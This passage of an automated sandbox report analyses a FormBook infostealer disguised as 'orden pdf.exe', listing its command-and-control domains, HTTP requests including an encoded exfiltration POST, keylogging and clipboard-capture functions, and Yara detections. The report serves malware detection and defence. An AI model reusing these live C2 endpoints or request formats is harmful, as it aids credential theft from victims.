7e 6a 4a 7a 61 6a 34 44 56 41 33 69 37 62 36 48 65 72 48 33 71 34 61 4e 41 5f 51 37 31 36 64 43 6e 69 47 6c 30 57 6f 47 32 49 57 35 36 47 42 55 45 53 70 35 30 65 62 55 62 56 41 63 42 44 46 37 31 74 53 4a 34 62 51 4f 66 6a 52 61 4a 77 71 71 68 4e 4d 4e 38 58 78 59 6b 77 6b 41 56 64 67 51 43 79 65 6b 4a 5f 39 38 6a 66 7e 2d 69 54 65 51 55 62 72 65 42 55 61 4d 7e 2d 32 52 30 62 68 36 74 4c 58 48 52 4d 48 4c 52 71 36 57 45 6e 39 58 46 49 30 62 61 52 6e 50 6e 4e 44 36 7a 52 30 67 50 6d 73 57 33 54 63 4d 47 6d 46 7a 43 68 59 6e 78 73 79 58 78 67 74 52 7a 53 52 79 71 6e 53 65 32 44 72 4e 63 72 47 48 46 33 28 34 65 30 79 5f 73 76 6c 54 75 46 61 76 36 4c 72 53 28 38 73 4f 28 4c 52 6b 4b 47 49 57 66 4f 6d 6a 46 49 74 32 47 6d 64 79 77 53 36 5f 76 33 77 43 51 41 79 71 59 44 35 4d 61 77 41 49 6a 44 51 61 47 48 78 58 57 4b 59 4e 73 57 55 66 73 63 4c 4c 75 52 30 59 4d 66 68 4e 70 47 4e 73 37 72 46 45 44 48 58 75 7e 61 47 46 59 35 51 65 74 4b 31 4e 4d 44 34 6d 6b 73 37 48 4c 6a 4e 6f 65 69 39 73 28 57 4a 5a 58 67 56 4b 32 4d 61 63 79 70 35 53 64 43 36 4c 4b 30 49 51 35 6f 6f 42 71 46 59 78 4e 54 30 71 52 36 4c 39 37 37 62 62 6f 6e 58 6f 50 4e 43 30 69 38 45 53 36 48 75 50 53 58 4f 41 59 4f 72 6c 53
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_001C4EB5
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.unbelievabowboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.bepbosch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.hydrabadproperties.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.unbelievabowboutique.com
Source: unknown HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 4e 3d 45 54 48 6b 53 75 63 2d 4a 31 62 5f 59 68 4c 49 6e 4b 54 7a 4f 66 66 4b 37 4e 7a 50 32 38 5a 33 55 35 49 59 34 45 5a 55 28 62 32 7a 48 66 6a 37 48 59 72 77 59 6a 44 43 6a 65 53 34 69 55 62 6b 73 75 65 79 31 79 76 37 74 46 44 63 73 57 67 49 44 50 43 73 61 50 74 4a 6d 4e 4c 61 36 39 35 74 37 44 58 76 38 70 78 34 6d 57 43 6a 58 6b 51 32 39 7a 43 63 66 54 4f 35 5a 4a 50 5a 4d 39 45 32 35 66 55 4b 43 41 7e 2d 68 34 54 4e 51 32 6c 36 37 6a 68 5f 79 4a 79 72 46 48 50 69 54 49 6a 46 4b 51 7a 38 71 78 38 45 68 68 46 41 33 57 5a 63 4b 72 30 6c 48 64 36 51 57 66 58 34 72 6d 4c 31 54 5a 75 5f 48 77 78 4b 45 54 51 30 53 4b 48 74 62 61 6d 37 33 34 68 30 53 48 34 6a 36 56 67 32 61 74 6b 43 7e 50 28 7a 74 76 32 2d 70 7a 63 69 79 56 64 39 35 77 73 6b 64 6a 4a 38 5a 4e 32 55 4e 52 6f 34 64 4a 34 61 62 36 71 55 51 66 70 62 51 4b 44 52 52 4d 46 6c 6f 6c 7e 2d 36 47 4c 5a 6a 31 28 75 6d 51 6c 38 6e 2d 56 5f 47 65 31 54 69 61 63 6e 64 6e 56 57 76 37 37 52 37 68 48 61 50 58 44 48 6d 5a 6d 71 37 6f 54 35 4a 5a 6f 47 36 4e 49 68 72 50 30 55 55 6d 47 64 52 73 79 49 63 51 65 4e 59 2d 37 67 71 47 41 5f 62 4e 5a 2d 45 43 37 61 28 30 4e 31 72 67 4b 37 4e 67 54 4c 74 4c 67 53 54 75 7a 72 65 6f 46 75 48 2d 49 58 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: rN=ETHkSuc-J1b_YhLInKTzOffK7NzP28Z3U5IY4EZU(b2zHfj7HYrwYjDCjeS4iUbksuey1yv7tFDcsWgIDPCsaPtJmNLa695t7DXv8px4mWCjXkQ29zCcfTO5ZJPZM9E25fUKCA~-h4TNQ2l67jh_yJyrFHPiTIjFKQz8qx8EhhFA3WZcKr0lHd6QWfX4rmL1TZu_HwxKETQ0SKHtbam734h0SH4j6Vg2atkC~P(ztv2-pzciyVd95wskdjJ8ZN2UNRo4dJ4ab6qUQfpbQKDRRMFlol~-6GLZj1(umQl8n-V_Ge1TiacndnVWv77R7hHaPXDHmZmq7oT5JZoG6NIhrP0UUmGdRsyIcQeNY-7gqGA_bNZ-EC7a(0N1rgK7NgTLtLgSTuzreoFuH-IXYw).
Source: explorer.exe, 00000003.00000000.272132994.000000000F76B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.allworljob.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.allworljob.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.allworljob.com/n7ak/www.healthywithhook.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.allworljob.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.bepbosch.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.bepbosch.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.bepbosch.com/n7ak/www.huro14.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.bepbosch.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.excelcapfunding.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.excelcapfunding.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.excelcapfunding.com/n7ak/www.allworljob.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.excelcapfunding.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com/n7ak/www.librosdecienciaficcion.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com/n7ak/www.s-immotanger.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com/n7ak/www.wwwswty6655.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com/n7ak/www.myultimateleadgenerator.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info/n7ak/www.office4u.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.infoReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/MicrM
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online/n7ak/www.ultimatewindowusa.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.onlineReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/www.manfast.online
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info/n7ak/www.hanaleedossmann.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.infoReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com/n7ak/www.joomlas123.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com/n7ak/www.bepbosch.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_001C6B0C
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_001C6B0C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_001B2B37
Installs a raw input device (often for capturing keystrokes)
Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_001DF7FF

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
